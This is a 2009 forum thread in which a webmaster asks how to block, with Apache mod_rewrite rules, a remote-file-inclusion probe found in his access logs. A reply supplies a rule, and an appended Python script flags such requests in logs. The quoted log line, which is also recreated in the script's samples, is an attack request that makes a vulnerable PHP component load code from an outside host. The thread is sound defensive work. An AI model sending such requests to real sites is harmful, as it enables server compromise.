Here is a logfile snippet:
135.196.18n.203 - - [14/Apr/2009:13:06:15 -0400] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://193.111.24n.157/zzzz/(my domain name)/103 HTTP/1.1" 404 325 "-" "-"
The above logfile snippet changes drastically with each attempt, EXCEPT for the 193.111.224.257 IP address, which best I can tell tries to capture the behavior of my server based on the query string they hammer it with.
Since everything else can and does change, blocking by source IP and so forth would be more difficult. So I thought I could use mod_rewrite functionality in my htaccess file in the root of my attacked websites to thwart these pests :)
So, after many, many attempts and lots of head scratching, I came up with this as my "best effort", though according to my logs these pages are still redirected to 193.111.24n.157
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{QUERY_STRING} .*193\.111\.24n\.157.*
RewriteRule .* /jerk.php
I'm confident my understanding of mod_rewrite is not deep enough to really understand what I am doing, so maybe one of you kind folks could give me a few pointers.
In a nutshell, if any request to my web server contains that specific IP address in the URL (query string), whatever they requested will be ignored and the ./jerk.php file presented in its place.
Whether the requested page + query string is valid, or not. Is that something I can do with mod_rewrite? Am I getting closer to my goal?
My /var/log/access_log and /var/log/error_log files do not show anything out of the ordinary whether I have the above code in my htaccess or not, thus my being terribly confused.
Advice, pointers, suggestions, and a swift thwack in the side of the head are acceptable and appreciated :)
Regards,
Frederic, regex-clueless.
[edited by: jdMorgan at 7:45 pm (utc) on April 19, 2009]
[edit reason] Obscured specific IP addresses [/edit]
Wilderness' solution may in fact be the most efficient for you. But if they start spoofing valid user-agent strings, then combining elements of your code with some of his is a good solution:
RewriteEngine on
#
RewriteCond $1 !^path-to-custom/403-error-page\.html$
RewriteCond %{HTTP_USER_AGENT} ^-?$ [OR]
RewriteCond %{QUERY_STRING} 193\.111\.24n\.157
RewriteRule ^(.*)$ - [F]
Jim
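An added example, not part of the thread: a log triage script that finds requests whose query string carries an absolute URL as a parameter value and counts how many distinct clients used each payload host, which is the stable indicator the question describes. It assumes Apache combined log format; the function names and the sample lines (documentation-range addresses, hypothetical paths) are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
# A parameter value that is itself an absolute URL, as in the logged request
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://([^/?#:]+)', re.I)

# Constructed sample lines, not taken from the thread
SAMPLE = [
    '192.0.2.10 - - [14/Apr/2009:13:06:15 -0400] "GET //com_directory/modules/mod_pxt_latest.php'
    '?GLOBALS[mosConfig_absolute_path]=http://203.0.113.7/zzzz/example.org/103 HTTP/1.1" 404 325 "-" "-"',
    '198.51.100.23 - - [14/Apr/2009:13:09:41 -0400] "GET /index.php?option=com_x'
    '&mosConfig_absolute_path=http%3A%2F%2F203.0.113.7%2Fzzzz%2Fid.txt HTTP/1.1" 404 310 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [14/Apr/2009:13:12:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client, payload_hosts, blank_ua) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, _status, ua = m.groups()
    query = target.partition("?")[2]
    hosts = []
    # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too
    for _name, value in parse_qsl(query, keep_blank_values=True):
        hit = REMOTE_URL_RE.match(value.strip())
        if hit:
            hosts.append(hit.group(1).lower())
    return client, hosts, ua in ("", "-")  # same test as ^-?$ on the User-Agent

def summarize(lines):
    """Map each payload host to its number of distinct clients; also count blank-UA hits."""
    clients_per_host, blank_ua_hits = {}, 0
    for line in lines:
        parsed = classify(line)
        if not parsed:
            continue
        client, hosts, blank_ua = parsed
        blank_ua_hits += blank_ua and bool(hosts)
        for host in hosts:
            clients_per_host.setdefault(host, set()).add(client)
    return {h: len(c) for h, c in clients_per_host.items()}, blank_ua_hits

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

A payload host reached from several client addresses is the candidate for the QUERY_STRING condition, and the blank-UA count shows how many of those requests the User-Agent condition alone would already catch.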